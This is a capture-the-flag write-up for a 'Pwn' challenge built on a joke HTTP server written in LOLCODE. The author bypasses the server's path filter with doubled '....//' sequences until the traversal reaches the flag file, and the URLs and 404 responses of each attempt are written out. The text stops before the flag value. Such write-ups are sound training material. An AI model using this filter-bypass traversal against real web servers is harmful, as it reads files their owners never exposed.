Category: Pwn Points: 35 Description:
$ curl http://play.spgame.site:13337/README.lol HAI 1.337 CAN HAS STDIO? I HAS A file ITZ I IZ STDIO'Z OPEN YR "README.lol" AN YR "r" MKAY VISIBLE I IZ STDIO'Z LUK YR file AN YR 13337 MKAY OBTW Flag is at /home/lolc0ded/flag.lol. TLDR KTHXBYE
The service is running at http://play.spgame.site:13337/. Feel free to check out http://play.spgame.site:13337/index.lol to learn more about lolc0ded.
Possibly one of the most nugget brained challenge for this year, a HTTP server that runs on garbled crap. In a nutshell, we need to do directory tranversals. Since we have a very verbose 404 page, we just keep trying
http://play.spgame.site:13337/home/../home/lolc0ded/flag.lol. Apparently, this filters out to become
http://play.spgame.site:13337/home/lolc0ded/flag.lol. No matter how many
../ you put, it just seems to redirect back.
So let's try
http://play.spgame.site:13337/home//../home/lolc0ded/flag.lol, you get redirected to,
http://play.spgame.site:13337/home/home/lolc0ded/flag.lol. Interesting pattern now. Is doubling the symbol working? Let's try
.... now! With
http://play.spgame.site:13337/home//....//home/lolc0ded/flag.lol You get back the original file at
http://play.spgame.site:13337/home/lolc0ded/flag.lol except this time around, the url didn't redirect!
Now let's try iterating it upwards. With
http://play.spgame.site:13337/home//....//home/lolc0ded/flag.lol we have the fake flag file. With
http://play.spgame.site:13337/home//....//....//home/lolc0ded/flag.lol we have a brutal 404 page with
Not Found The requested URL /home//../../home/lolc0ded/flag.lol was not found on this server.
Perfect. At no. 4 we get the flag.
Therefore, the flag is